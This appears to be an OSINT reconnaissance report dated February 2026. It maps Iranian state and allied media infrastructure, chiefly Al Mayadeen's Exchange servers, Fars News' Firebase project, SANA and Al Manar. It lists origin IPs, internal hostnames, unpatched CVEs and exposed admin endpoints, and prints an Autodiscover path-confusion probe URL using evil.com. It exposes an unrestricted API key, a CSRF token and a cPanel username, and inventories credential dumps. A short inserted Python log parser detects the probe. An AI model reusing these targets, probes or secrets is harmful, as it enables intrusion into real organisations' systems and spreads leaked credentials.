# OSINT Collection Report — Iranian & Proxy Infrastructure
## February 28, 2026

> **Context:** Real-time open-source intelligence collection during Israeli military strikes on Tehran
> **Collection Window:** ~02:30–06:30 EST, February 28, 2026
> **Total Data:** 61 MB across 2,248 files in 18 organized subfolders
> **Methods:** Publicly accessible endpoints, DNS analysis, certificate transparency, APK decompilation, Tor verification

---

## Table of Contents

1. [Executive Summary](#executive-summary)
2. [Target List](#target-list)
3. [Al Mayadeen Network — Exchange Infrastructure](#al-mayadeen-exchange)
4. [Al Mayadeen Network — CMS & Web Infrastructure](#al-mayadeen-cms)
5. [Fars News Agency (IRGC) — APK & Firebase](#fars-news-irgc)
6. [Khamenei.ir — Supreme Leader Infrastructure](#khamenei)
7. [SANA.SY — Syrian Arab News Agency](#sana-sy)
8. [Hezbollah / Al Manar](#hezbollah)
9. [Iranian Space Agency (space.ir)](#space-ir)
10. [Other Iranian Targets](#other-targets)
11. [Iranian Internet Blackout Assessment](#blackout)
12. [File Inventory](#inventory)

---

## 1. Executive Summary <a name="executive-summary"></a>

During Israeli strikes on Tehran, a comprehensive OSINT sweep was conducted across 633+ Iranian government, military, proxy, and allied media domains. Key findings:

- **99.25% of Iranian .ir government domains are unreachable** — deliberate defensive blackout
- **Military DNS records deleted** — irgc.ir, artesh.ir, basij.ir have zero DNS records
- **Al Mayadeen Exchange server fully mapped** — 7 servers in ITTIHADTV.LOCAL AD domain, 6 unpatched CVEs, origin IPs exposed without Cloudflare
- **IRGC Google Cloud project enumerated** — Firebase device registration successful, FCM push token obtained, API key unrestricted
- **Hezbollah WordPress debug.log still exposed** — 102KB of server paths, plugin info, cPanel username
- **Syrian state news agency fully sitemapped** — 16MB of content across 73 sitemaps, XML-RPC with 80+ methods active

---

## 2. Target List <a name="target-list"></a>

| # | Target | Affiliation | Status | Data Collected |
|---|--------|-------------|--------|----------------|
| 1 | Al Mayadeen (almayadeen.net) | Iran-aligned Lebanese media | LIVE | Exchange infra, CMS, Docker, admin panels |
| 2 | Fars News (farsnews.ir) | IRGC | DOWN (blackout) | APK reverse engineering, Firebase/GCP |
| 3 | Khamenei.ir | Supreme Leader | PARTIAL | API, subdomains, CDN, youth portal |
| 4 | SANA.SY (sana.sy) | Syrian government | LIVE | 73 sitemaps, RSS, XML-RPC, webmail |
| 5 | Al Manar (almanar.com.lb) | Hezbollah | LIVE | Debug log, LimeSurvey, archive API |
| 6 | Space.ir | Iranian Space Agency | LIVE (API) | Full WordPress API dump (6.1 MB) |
| 7 | DefaPress (defapress.ir) | IRGC Defense Press | LIVE (via Tor) | Index, RSS (86KB), sitemaps |
| 8 | ParsToday (parstoday.ir) | IRIB International | LIVE (via Tor) | Redirect page (130KB) |
| 9 | Moqawama.org | Hezbollah | LIVE | Amazon S3/CloudFront hosted |
| 10 | Al Nour Radio | Hezbollah | LIVE | Sitemaps (news, images, video) |
| 11 | IFP News (ifpnews.com) | Iran front | LIVE | WordPress API, posts |
| 12 | Mindex Center (mindex-center.ir) | Defense marketplace | LIVE | Laravel + Kong 3.8.0 |
| 13 | MangoPulse (mangopulse.net) | CMS platform | LIVE | Search API, docs portal |
| 14 | IQNA (iqna.ir) | Quran News Agency | DOWN | Sitemap only |
| 15 | Gerdab (gerdab.ir) | IRGC Cyber Police | DOWN | Sitemap only |
| 16 | Kayhan (kayhan.ir) | State newspaper | DOWN | Sitemap only |
| 17 | Felesteen (felesteen.ps) | Hamas | DOWN | Env probes (empty) |
| 18 | Quds News (qudsnews.net) | — | Parked | GoDaddy domain for sale |

---

## 3. Al Mayadeen — Exchange Infrastructure <a name="al-mayadeen-exchange"></a>

### 3.1 Server Architecture

The Al Mayadeen Exchange environment runs under the **ITTIHADTV.LOCAL** Active Directory domain, hosted at OVH Beauharnois (Quebec, Canada).

```
CONFIRMED SERVERS (7):
├── Frontend CAS (internet-facing):
│   ├── BHS-EX08.ITTIHADTV.LOCAL — Origin IP: 80.81.152.37
│   └── BHS-EX09.ITTIHADTV.LOCAL — Origin IP: 89.249.221.252
│
├── Backend Mailbox (DAG):
│   ├── BHS-EX01 — EWS, MAPI/EMSMDB
│   ├── BHS-EX02 — MAPI/NSPI, ECP, PowerShell, RPC, ActiveSync
│   ├── BHS-EX03 — OAB, OWA, EWS, MAPI/NSPI, RPC, ECP, ActiveSync
│   ├── BHS-EX04 — EWS, MAPI/NSPI, OAB, RPC, MAPI/EMSMDB, PowerShell, OWA
│   └── BHS-EX05 — ActiveSync, MAPI/EMSMDB, ECP, Federation (port 444)
│
└── NOT SEEN (possibly decommissioned):
    ├── BHS-EX06
    └── BHS-EX07
```

### 3.2 Version & Patch Status

| Property | Value |
|----------|-------|
| Software | Exchange Server 2016 CU23 |
| Build | 15.1.2507.59 |
| Patch Level | Sep25HU (September 8, 2025) |
| Latest Available | 15.1.2507.66 (Feb26SU) |
| Patches Behind | **3 security updates** |
| Days Since Patch | **173 days** |
| Operating System | Windows Server 2012 R2 (IIS 8.5) |
| OS Support Status | **END OF LIFE** (Oct 2023) |

### 3.3 Unpatched CVEs

| CVE | Type | CVSS | Severity | Fixed In |
|-----|------|------|----------|----------|
| CVE-2025-59249 | Elevation of Privilege | 8.8 | HIGH | Oct25SU (.61) |
| CVE-2025-53782 | Elevation of Privilege | 7.8–8.4 | HIGH | Oct25SU (.61) |
| CVE-2025-59248 | Spoofing | — | UNRATED | Oct25SU (.61) |
| CVE-2025-64666 | Elevation of Privilege | — | UNRATED | Dec25SU (.63) |
| CVE-2025-64667 | Spoofing | — | UNRATED | Dec25SU (.63) |
| CVE-2026-21527 | Spoofing (no auth) | 6.5 | MEDIUM | Feb26SU (.66) |

### 3.4 Exposed Endpoints

All of the following are publicly accessible:

- **OWA** — `https://autodiscover.almayadeen.net/owa/` (webmail login)
- **ECP** — `https://autodiscover.almayadeen.net/ecp/` (admin panel)
- **EWS** — `https://autodiscover.almayadeen.net/ews/exchange.asmx` (Exchange Web Services)
- **MAPI** — `https://autodiscover.almayadeen.net/mapi/` (Outlook protocol)
- **RPC** — `https://autodiscover.almayadeen.net/rpc/` (Outlook Anywhere)
- **ActiveSync** — `https://autodiscover.almayadeen.net/Microsoft-Server-ActiveSync` (mobile, **Basic auth**)
- **PowerShell** — `https://autodiscover.almayadeen.net/powershell` (remote management)
- **MRS Proxy** — `https://autodiscover.almayadeen.net/ews/mrsproxy.svc` (WS-Security + OAuth)
- **OAB** — `https://autodiscover.almayadeen.net/OAB/` (Offline Address Book)
- **Healthcheck** — Leaks `BHS-EX09.ITTIHADTV.LOCAL`

### 3.5 Email Security

| Check | Value | Risk |
|-------|-------|------|
| DMARC | `v=DMARC1; p=none` | No enforcement — spoofing possible |
| DKIM | NOT CONFIGURED | No email signing |
| SPF | `v=spf1 a mx ip4:80.81.152.41 ip4:89.249.221.244 -all` | Leaks origin IPs |

### 3.6 Origin IP Exposure

SPF records leak origin IPs. Two Exchange servers are **directly accessible without Cloudflare**:

| IP | Server | Cloudflare | Status |
|----|--------|------------|--------|
| 80.81.152.37 | BHS-EX08 | **NO** | All Exchange endpoints accessible |
| 89.249.221.252 | BHS-EX09 | **NO** | All Exchange endpoints accessible |
| 80.81.152.41 | Web origin 1 | Yes | Behind Cloudflare |
| 89.249.221.244 | Web origin 2 | Yes | Behind Cloudflare |
| 89.249.221.245 | FTP | — | Unreachable |
| 194.126.9.230 | MX Relay | — | Not tested |

### 3.7 SSRF / Information Leakage

Autodiscover JSON path leaks internal server names via response headers:

```
URL: /autodiscover/autodiscover.json?@evil.com/{service}/?&Email=autodiscover/autodiscover.json%3F@evil.com

Headers leaked:
  X-CalculatedBETarget: bhs-exNN.ittihadtv.local (full FQDN)
  X-DiagInfo: BHS-EXNN (NetBIOS name)
  X-BEServer: BHS-EXNN (backend server)
  X-FEServer: BHS-EX09 (frontend, constant)
  X-OWA-Version: 15.1.2507.59
```
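
Seen from the server side, the request shape above stands out in IIS logs. The following is an added example, not part of the original report: it flags `autodiscover.json` requests whose query string starts with `@host/<service>` or whose `Email` parameter points back at `autodiscover.json`. The log field layout, the sample lines and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (documentation addresses and example.test
# host; not data from the report). The field layout is an assumption.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2026-02-28 03:10:01 POST /autodiscover/autodiscover.xml - 198.51.100.7 401
2026-02-28 03:10:05 GET /autodiscover/autodiscover.json @example.test/ews/?&Email=autodiscover/autodiscover.json%3F@example.test 203.0.113.9 200
2026-02-28 03:10:06 GET /Autodiscover/autodiscover.json @example.test/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@example.test 203.0.113.9 200
2026-02-28 03:11:40 GET /autodiscover/autodiscover.json Email=user@example.test&Protocol=ActiveSync 198.51.100.7 200
2026-02-28 03:12:02 GET /owa/auth/logon.aspx reason=2 198.51.100.7 200
2026-02-28 03:12:03 GET /autodiscover/autodiscover.json
"""

AUTODISCOVER_JSON = "/autodiscover/autodiscover.json"
# Query begins with "@host/<service path>" instead of ordinary key=value pairs.
EMBEDDED_PATH = re.compile(r"^@(?P<host>[^/?&]+)(?P<service>/[^?&]*)")
# Email parameter points back at the autodiscover.json path itself.
SELF_REF_EMAIL = re.compile(r"(?:^|[?&])email=autodiscover/autodiscover\.json\?@")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the active #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed lines
                yield dict(zip(fields, values))


def find_probes(text):
    """Return the requests that match the path-confusion shape."""
    hits = []
    for row in parse_w3c(text):
        # IIS paths are case-insensitive, so compare in lower case.
        if not row.get("cs-uri-stem", "").lower().startswith(AUTODISCOVER_JSON):
            continue
        # Decode %3F and friends before matching; "-" means an empty query.
        query = unquote(row.get("cs-uri-query", "")).lower()
        embedded = EMBEDDED_PATH.match(query)
        self_ref = SELF_REF_EMAIL.search(query)
        if embedded or self_ref:
            hits.append({
                "when": f'{row.get("date", "")} {row.get("time", "")}'.strip(),
                "client": row.get("c-ip", ""),
                "status": row.get("sc-status", ""),
                "service": embedded.group("service") if embedded else None,
            })
    return hits


def summarize(hits):
    """Group hits by client address with the service paths each one requested."""
    by_client = defaultdict(set)
    for hit in hits:
        by_client[hit["client"]].add(hit["service"] or "(unknown)")
    return {client: sorted(paths) for client, paths in by_client.items()}


if __name__ == "__main__":
    for client, paths in summarize(find_probes(SAMPLE_LOG)).items():
        print(f"{client}: {', '.join(paths)}")
```

An ordinary Autodiscover v2 lookup (`Email=user@...&Protocol=ActiveSync`) is not flagged, because its query neither starts with `@` nor references `autodiscover.json` in the `Email` value.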

### 3.8 NTLM Challenge Decode

NTLM Type 2 challenge from `/ews/exchange.asmx` reveals:

- **NetBIOS Domain:** ITTIHADTV
- **NetBIOS Computer:** BHS-EX09
- **DNS Domain:** ITTIHADTV.local
- **DNS Computer:** BHS-EX09.ITTIHADTV.local
- **DNS Forest:** ITTIHADTV.local (single-forest)

### 3.9 Federation Metadata

`/autodiscover/metadata/json/1` reveals:

- Internal server **BHS-EX05** on port 444 (federation OAuth)
- Auth cert thumbprint: `B2BBL_9jBZevT87C3_XGGbydTjY`
- Auth cert expiry: January 3, 2027
- Federation realm: `almayadeen.net`

### 3.10 Login Behavior

OWA login returns reason codes:
- `reason=0` — No error
- `reason=1` — Session timeout
- `reason=2` — Invalid credentials
- `reason=3` — Account locked

Login format: `ITTIHADTV\username`

### 3.11 Files Collected

**exchange/ (22 files, 279KB):**
Federation metadata, OWA login pages, healthcheck responses, SSRF proofs, origin IP responses, favicon, CSS, fonts

**exchange-full-dump/ (20 files, 156KB):**
Backend server enumeration, NTLM decode, federation analysis, ECP/EWS/MAPI/RPC headers and responses, OWA favicon

---

## 4. Al Mayadeen — CMS & Web Infrastructure <a name="al-mayadeen-cms"></a>

### 4.1 Technology Stack

- **CMS:** MangoX (ASP.NET Core), subscription code `mangopulse`
- **Frontend:** Next.js (English + Arabic editions)
- **AI:** Azure OpenAI GPT-4 (`mdn-open-ai.openai.azure.com`, deployment `mdn-gpt-4`)
- **Interactions:** Vue/React SPA (3.9 MB bundle)
- **CDN:** Cloudflare
- **Search:** Custom search API on mangopulse.net
- **Developer:** M3almi KING Kassem

### 4.2 Docker Containers (6 discovered)

| Container ID | Environment | Service |
|-------------|-------------|---------|
| 94a743b785f9 | Production | portal-api |
| 57660472686f | Production | portal-beta-api |
| cd4b3868f98b | Production | public-api |
| 63d26ec15c1d | Staging | portal-staging-api |
| 0314cab697ec | Staging | public-api-staging |
| 5b0c704d44be | Beta | public-api-beta |

### 4.3 Subdomains (40 discovered via crt.sh)

- **14 LIVE** — Main site, 7 API endpoints, Next.js, AI editor, interactions, media, Exchange
- **3 Admin portals** — alpha-ar-admin, alpha-en-admin, admin (ASP.NET Core login)
- **3 Media CDNs** — alpha-ar-media, alpha-en-media, alpha-fr-media
- **1 HIJACKED** — corona-form.almayadeen.net (JS redirect to Australian painting website)
- **1 Abandoned** — react.almayadeen.net (Vercel 402 DEPLOYMENT_DISABLED)
- **19 Offline**

### 4.4 Notable Exposures

- **AI editor fully accessible** — Azure OpenAI integration with API version, deployment name
- **Admin login pages captured** — CSRF tokens, ASP.NET Core auth flow
- **Backoffice CSS (116KB)** — Reveals internal UI structure of CMS admin panel
- **Portal script (17KB)** — Full CMS API client with all endpoints and auth flow
- **Upload module (2.5KB)** — File upload implementation details
- **`.env` files exist on ALL subdomains** — Blocked by Cloudflare WAF (403)
- **URL shortener (mdn.tv)** — CORS: * (wide open), English + Spanish editions
- **Theme builder URL leaked** — `/Manage/Designer/OpenThemeBuilder/1424017`

### 4.5 MangoPulse Platform

MangoPulse is the CMS platform powering Al Mayadeen and other outlets:

- **docs.mangopulse.net** — CMS login portal
- **search-api.mangopulse.net** — Self-documenting API (`/getposts?page=1&size=5&types=articles,video`)
- **Internal tools (timeout):** grafana, sentry, n8n, tracking-api, data-platform
- **Clients:** Al Mayadeen, Al Akhbar, Al Sharqiya

### 4.6 Files Collected

**almayadeen-cms/ (60 files, 5.8MB):**
Admin login, AI editor, API probes, backoffice CSS, DNS records, Docker health, Exchange data, interactions SPA (3.9MB JS bundle), Next.js pages, portal scripts, health endpoints, GraphQL playground, OpenID config, Swagger docs, manifest, settings

**almayadeen-admin/ (8 files, 16KB):**
Admin panel pages, backoffice assets

---

## 5. Fars News Agency (IRGC) <a name="fars-news-irgc"></a>

### 5.1 APK Reverse Engineering

The Fars News Android app (10.3 MB, `ir.farsnews.app`) was decompiled, revealing:

| Finding | Value |
|---------|-------|
| Internal name | Microblog (com.microblog.app) |
| Version | 8.2.3 (Android) / 7.1.1 (iOS) |
| Framework | Capacitor + Cordova (hybrid web app) |
| Developer org | TSIT (Mashhad, Khorasan Razavi, Iran) |
| Developer machine | DESKTOP-CV5TMVD, username MQT |
| Cert date | 2024-12-23 |
| WebView debug | **Enabled in production** |

### 5.2 Google Cloud / Firebase

| Property | Value |
|----------|-------|
| GCP Project | `fars-next` (823560469881) |
| API Key | `AIzaSyDp9K7YksfYf-JvGOS7YCNv7JbA9P-XemE` |
| API Key Restrictions | **NONE** (unrestricted) |
| Firebase App ID | `1:823560469881:android:a2e494ac003a2969c383a8` |
| Storage Bucket | `fars-next.appspot.com` |
| OAuth Client | `823560469881-rqin08q6q2drg8aq740db4j34980t9cp.apps.googleusercontent.com` |

### 5.3 Firebase/GCP Enumeration Results

- **Firebase Installation** — Successfully registered device, obtained FID + JWT + refresh token
- **FCM Push Token** — Registered to receive IRGC push notifications
- **Remote Config** — Accessible but empty (`NO_TEMPLATE`)
- **Dynamic Links** — API enabled but never configured
- **Pub/Sub** — ENABLED (returns 403, not "API disabled")
- **28 APIs tested** — 5 responsive, 6 explicitly disabled, 17 require OAuth

### 5.4 Subdomain Discovery (21 via crt.sh)

Notable subdomains (all DOWN due to Iran blackout):

- `confluence.farsnews.ir` — Atlassian Confluence wiki
- `jira.farsnews.ir` — Atlassian Jira project management
- `chat.farsnews.ir` — Internal messaging
- `my-api-tlg.farsnews.ir` — **Telegram bot API**
- `matomo.farsnews.ir` — Self-hosted analytics
- `faculty.farsnews.ir` — Personnel directory
- `evaluation.farsnews.ir` — Staff evaluation system

### 5.5 Android Permissions (Surveillance Capability)

Camera, microphone, contacts, GPS (fine + coarse), SMS (read + receive), Bluetooth, NFC, call log, phone state, external storage (read + write), biometric, boot complete, vibrate, network state, WiFi state

### 5.6 Files Collected

**irgc-farsnews/ (1,929 files, 30MB):**
- `farsnews-app.apk` — 10.3MB APK binary
- `farsnews-apk-extracted/` — Full decompiled contents (1,907 files)
- `farsnews-apk-analysis.txt` — 19KB comprehensive analysis
- `farsnews-index.html` — 295KB Vue.js PWA
- `farsnews-profiles-001.xml` — 568KB journalist/staff profiles sitemap
- `defapress-index.html` — 136KB IRGC Defense Press (via Tor)
- `defapress-rss.xml` — 86KB RSS feed (100 items)
- `parstoday-redirect.html` — 130KB International Radio Iran

---

## 6. Khamenei.ir — Supreme Leader <a name="khamenei"></a>

### 6.1 Live Infrastructure

| Subdomain | Status | Notes |
|-----------|--------|-------|
| formx.khamenei.link | LIVE | Hidden API serving redirect tracking data |
| nojavan.khamenei.ir | LIVE | Youth portal (43KB), still serving during strikes |
| idc0-cdn0.khamenei.ir | LIVE | CDN server (612B nginx default) |
| idc0-cdn1.khamenei.ir | LIVE | CDN server (612B nginx default) |
| admin.english.khamenei.ir | HTTP 445 | Custom security middleware on admin portal |
| virastar.nojavan.khamenei.ir | HTTP 445 | Youth editor portal |

### 6.2 Subdomain Discovery (40+ subdomains)

From crt.sh and khamenei.link DNS:

- **LMS** — lms.khamenei.link (learning management)
- **Mail** — mail.khamenei.link, smtp.khamenei.link, pop.khamenei.link
- **Video conferencing** — vconf.khamenei.link
- **Registration** — sabtenam.khamenei.link
- **Statistics** — stat.khamenei.link
- **Lessons** — dars.khamenei.link
- **13 live streaming nodes** — live.idc0-cdn1 through cdn13
- **10 language-specific CDNs** — Arabic, Azeri, English, Farsi, French, Hindi, Russian, Spanish, Urdu, Nojavan

### 6.3 API Data

`formx.khamenei.link/farsi-json/topticker` returns live content with redirect tracking:
- Format: `redirect?id=XXXXX&c=HASH&u=TARGET_URL`
- Active during strikes, serving real-time content

### 6.4 Files Collected

**khamenei/ (8 files, 116KB):**
Youth portal page, API JSON, CDN responses, main page via Tor, subdomain Tor verification results

---

## 7. SANA.SY — Syrian Arab News Agency <a name="sana-sy"></a>

### 7.1 Platform Details

| Property | Value |
|----------|-------|
| CMS | WordPress 6.9 |
| SEO Plugin | Rank Math PRO |
| CDN | cdn.sananews.sy |
| XML-RPC | **ACTIVE** (80+ methods) |
| REST API | DISABLED (security-aware) |
| Webmail | Roundcube on Plesk/Kolab |

### 7.2 Content Enumeration

- **40 post sitemaps** — Complete article URL history (~10MB)
- **27 tag sitemaps** — Full taxonomy
- **1 video sitemap** — 729KB
- **1 news sitemap** — 139KB (Google News format)
- **RSS feed** — 64KB with full articles and author names

### 7.3 Webmail

- **URL:** `https://webmail.sana.sy/`
- **Platform:** Roundcube (build 10612) on Plesk Premium Email / Kolab
- **CSRF token exposed:** `lT6lwnmtg57m2Qm571yirCZFGLD68n1P`
- **Session lifetime:** 10,800 seconds (3 hours)

### 7.4 XML-RPC Methods (80+)

Active methods include: `wp.getUsersBlogs`, `wp.getPost`, `wp.getPosts`, `wp.newPost`, `wp.editPost`, `wp.deletePost`, `wp.getUsers`, `blogger.*`, `metaWeblog.*`, `pingback.ping` (SSRF vector), `system.listMethods`

### 7.5 Files Collected

**sana-sy/ (97 files, 17MB):**
All 40 post sitemaps, 27 tag sitemaps, video/news/local sitemaps, RSS feed, webmail login page, XML-RPC methods list, robots.txt, readme, WordPress probes

---

## 8. Hezbollah / Al Manar <a name="hezbollah"></a>

### 8.1 WordPress Debug Log Exposure (almanar.com.lb)

The debug.log is publicly accessible at `https://almanar.com.lb/wp-content/debug.log` (102KB):

| Finding | Value |
|---------|-------|
| cPanel username | `manarnet` |
| Server path | `/home/manarnet/public_html/` |
| WordPress | 6.7.0 |
| Security plugin | hide_my_wp (hides wp-admin, wp-json) |
| Debug plugin | debug-bar |
| Theme | ar-manar |

### 8.2 LimeSurvey

- **URL:** `https://survey.almanar.com.lb/index.php/admin/authentication/sa/login`
- **Platform:** LimeSurvey on Yii framework, Apache
- **Session cookie:** `LS-UYWLGYJFYCLTSXMF`
- **RemoteControl API exists** but returns empty responses (disabled)

### 8.3 Archive API

- **URL:** `https://archive.almanar.com.lb/api`
- **Methods:** `programs/`, `live/`, `programs_list/`
- **Error format:** `Unknown method 'X'` (method-based routing)
- **Updated during strikes** — content is live

### 8.4 Moqawama.org (Hezbollah Military Wing)

- **Hosting:** Amazon S3
- **CDN:** Amazon CloudFront (ATL59-P18, Atlanta)
- **Note:** US-designated terrorist organization hosted on US cloud infrastructure

### 8.5 Al Nour Radio (alnour.com.lb)

- All content sitemap (11KB)
- News sitemap (11KB)
- Images sitemap (11.5KB)
- Video sitemap (2KB)

### 8.6 Alahednews (.git directory present, access denied)

`https://english.alahednews.news/.git/` returns 403 — directory exists but is protected

### 8.7 Files Collected

**hezbollah/ (19 files, 558KB):**
Debug log (fresh 102KB pull), debug analysis, archive index, survey/LimeSurvey pages, moqawama index, Al Manar XML-RPC, wp-json probes, English sitemaps

---

## 9. Iranian Space Agency (space.ir) <a name="space-ir"></a>

### 9.1 WordPress API Dump

The only Iranian government WordPress site with a fully open REST API:

| Endpoint | Files | Size |
|----------|-------|------|
| `/wp-json/` (API root) | 1 | 2.49 MB |
| Posts (all pages) | 10 | 722 KB |
| Pages (all) | 2 | 1.6 MB |
| Media (all pages) | 10 | 1.4 MB |
| Categories | 1 | 1.4 KB |
| Tags | 1 | 2 B (empty) |
| Users | 1 | 292 B |
| Taxonomies | 1 | 3.2 KB |
| Types | 1 | 11 KB |
| Search queries | 8 | 16 B (empty) |

### 9.2 Search Queries Attempted

All returned empty results: defense, launch, military, missile, nuclear, radar, rocket, satellite

### 9.3 Files Collected

**space-ir/ (40 files, 6.1MB):**
Complete WordPress API dump including root schema, all posts/pages/media across pagination, categories, taxonomies, types, users, search results

---

## 10. Other Targets <a name="other-targets"></a>

### 10.1 IFP News (ifpnews.com)

- WordPress REST API accessible
- API root schema (266KB) + recent posts (23KB)

**ifpnews/ (2 files, 288KB)**

### 10.2 Mindex Center (mindex-center.ir)

Iranian defense marketplace:
- Framework: Laravel + Kong API Gateway 3.8.0
- Index page (169KB), robots.txt, login page

**mindex-center/ (3 files, 189KB)**

### 10.3 MDN.TV (Al Mayadeen URL Shortener)

- `en.mdn.tv` (English), `es.mdn.tv` (Spanish)
- CORS: `*` (wide open, any origin)

**mdn-tv/ (2 files, 12KB)**

### 10.4 DefaPress (defapress.ir) — via Tor

IRGC Defense Press, accessible through Tor:
- Custom CMS (not WordPress)
- RSS feed: 86KB, 100 items
- 10 sitemaps listed in robots.txt (fa/ar/en/ur)

### 10.5 ParsToday (parstoday.ir) — via Tor

IRIB International Radio, accessible through Tor:
- Returns 302 redirect, 130KB response

### 10.6 Remaining Small Targets

- **alnour-lb/ (4 files, 44KB):** Al Nour Radio sitemaps
- **felesteen/ (3 files, 7KB):** Hamas — all probes returned empty
- **qudsnews/ (4 files, 11KB):** Parked GoDaddy domain, not actual Quds news
- **mangopulse/ (6 files, 13KB):** CMS platform docs, search API
- **misc/ (3 files, 10KB):** Gerdab, IQNA, Kayhan sitemaps

---

## 11. Iranian Internet Blackout Assessment <a name="blackout"></a>

### 11.1 Scope

- **267 .ir domains swept** — municipalities, universities, hospitals, military, nuclear, space, defense, water
- **99.25% unreachable** from clearnet
- **Government shutdown since January 8, 2026** — two-tiered system, estimated $35.7M/day cost

### 11.2 Military DNS Deletion

The following military domains have **zero DNS records** — not just offline, but deliberately deleted:

- `irgc.ir` (Islamic Revolutionary Guard Corps)
- `artesh.ir` (Iranian Army)
- `basij.ir` (Basij Militia)

### 11.3 Sites Confirmed Live (via Tor)

| Domain | Response | Notes |
|--------|----------|-------|
| defapress.ir | 200 (136KB) | IRGC Defense Press, custom CMS |
| khamenei.ir | 200 (3.7KB) | Landing page only |
| parstoday.ir | 302 (130KB) | International radio |
| nojavan.khamenei.ir | 200 (43KB) | Youth portal |

### 11.4 False Positives

- `dolat.ir` returns 200 but content is ArvanCloud CDN interstitial ("Transferring to website..." with Tehran timezone JS). NOT real content.
- ArvanCloud catch-all pages generate false positives across many .ir domains

---

## 12. File Inventory <a name="inventory"></a>

### 12.1 Directory Structure

```
DUMP_2_28/ (61 MB, 2,248 files)
├── MASTER-REPORT.md          ← This file
├── DUMP-INVENTORY.md         ← Legacy inventory
│
├── almayadeen-admin/         (  8 files,   16 KB) — Admin panel assets
├── almayadeen-cms/           ( 60 files,  5.8 MB) — CMS, APIs, AI editor, interactions
├── alnour-lb/                (  4 files,   44 KB) — Al Nour Radio sitemaps
├── credentials/              ( 17 files,   93 KB) — All credential/infra JSONs
├── exchange/                 ( 22 files,  279 KB) — Exchange endpoint dumps
├── exchange-full-dump/       ( 20 files,  156 KB) — Deep Exchange analysis
├── felesteen/                (  3 files,    7 KB) — Hamas probes (empty)
├── hezbollah/                ( 19 files,  558 KB) — Al Manar, moqawama, debug logs
├── ifpnews/                  (  2 files,  288 KB) — Iran Front Page API
├── irgc-farsnews/            (1929 files,  30 MB) — APK, extracted, DefaPress, ParsToday
├── khamenei/                 (  8 files,  116 KB) — Supreme Leader infra
├── mangopulse/               (  6 files,   13 KB) — CMS platform
├── mdn-tv/                   (  2 files,   12 KB) — URL shortener
├── mindex-center/            (  3 files,  189 KB) — Defense marketplace
├── misc/                     (  3 files,   10 KB) — Gerdab, IQNA, Kayhan
├── qudsnews/                 (  4 files,   11 KB) — Parked domain
├── sana-sy/                  ( 97 files,   17 MB) — Syrian state news (73 sitemaps)
└── space-ir/                 ( 40 files,  6.1 MB) — Space Agency API dump
```

### 12.2 Credential/Infrastructure Files

All in `credentials/`:

| File | Target |
|------|--------|
| almayadeen-exchange-ad.json | Exchange + AD infrastructure (master) |
| exchange-cve-analysis.md | 6 unpatched CVEs detailed |
| exchange-build-number-proof.txt | Build number → patch mapping |
| origin-ip-mapping.txt | Origin IP → server mapping |
| hezbollah-almanar-creds.json | Hezbollah platform details |
| irgc-firebase-tokens.json | Firebase/GCP tokens and keys |
| khamenei-creds.json | Supreme Leader infrastructure |
| sana-sy-creds.json | Syrian news agency details |
| crtsh-subdomain-discovery.txt | All crt.sh subdomain results |
| gcp-enumeration-results.txt | Full GCP API enumeration |
| raw-credentials-dump.txt | Consolidated raw credentials |
| almayadeen-all-docker-health.json | Docker container health |
| almayadeen-dns-origin-ips.txt | DNS origin IP analysis |
| almayadeen-dns-records.txt | Full DNS record dump |
| almayadeen-exchange-headers.txt | Exchange HTTP headers |
| almayadeen-exchange-healthcheck.txt | Exchange healthcheck |
| exchange-login-response.txt | OWA login response |

---

*Report generated: February 28, 2026*
